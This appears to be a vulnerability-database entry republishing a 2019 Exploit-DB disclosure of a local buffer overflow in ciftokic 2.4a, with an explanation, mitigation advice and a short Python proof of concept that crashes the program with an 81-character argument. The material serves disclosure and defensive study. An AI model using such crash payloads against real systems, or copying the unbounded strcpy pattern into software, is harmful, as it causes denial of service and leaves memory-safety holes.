Ciftokic 2.4a - DoS Buffer Overflow

vendor:

Not available

by:

@JosueEncinar

7.5

CVSS

HIGH

DoS Buffer Overflow

119

CWE

Product Name: Not available

Affected Version From: 2.4a

Affected Version To: 2.4a

Patch Exists: NO

Related CWE: Not available

CPE: Not available

Metasploit:

Other Scripts:

Platforms Tested: Ubuntu 18.04

2019

Ciftokic 2.4a – DoS Buffer Overflow

The vulnerability exists in the 'ciftokic.c' file in line 84, where the program uses the 'strcpy' function to copy the input argument into the 'CIFFile' variable without proper bounds checking. If the input argument is 80 characters or less, the program functions normally. However, if the input argument is 81 characters or more, a buffer overflow occurs, causing the program to fail.

Mitigation:

To mitigate this vulnerability, the program should use a safer function, such as 'strncpy', which allows specifying the maximum number of characters to copy and ensures that the destination buffer is not overflowed. Additionally, input validation should be implemented to check the length of the input argument before copying it into the destination buffer.

Source

Exploit-DB raw data:

# Exploit Title: Ciftokic 2.4a - DoS Buffer Overflow
# Date: September 30, 2019
# Exploit Author: @JosueEncinar
# Software Link: http://launchpad.net/ubuntu/+source/kic/2.4a-1
# Version: 2.4a 
# Tested on: Ubuntu 18.04

'''
If we check the ciftokic.c file on line 52 we see the following code: char CIFFile[81], *Tmp;.  
In line 84 we have the problem with the following instruction: strcpy(CIFFile,argv[1]);

If the first argument is 80 characters or less, nothing happens, but if we put from 81 onwards the program fails with a Buffer Overflow.
'''

# To test the code use Python 3.6+
from os import system
from sys import argv


def print_usage():
    print("Usage: python3 ciftokic_overflow.py <characters_numbers>")
    print("      |_No Buffer Overflow: python3 ciftokic_overflow.py 80")
    print("      |_Buffer Overflow: python3 ciftokic_overflow.py 81")

if len(argv) == 1:
    print_usage()
else:
    try:
        number = int(argv[1])
        payload = "J"*number
        system(f"ciftokic {payload}")
    except:
        print_usage()


"""

Output Example:

josue@josue:~/Escritorio$ python3 ciftokic_overflow.py 80
Error: can't read CIF input file JJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJJ
josue@josue:~/Escritorio$ python3 ciftokic_overflow.py 81
*** buffer overflow detected ***: ciftokic terminated
Aborted (core dumped)

"""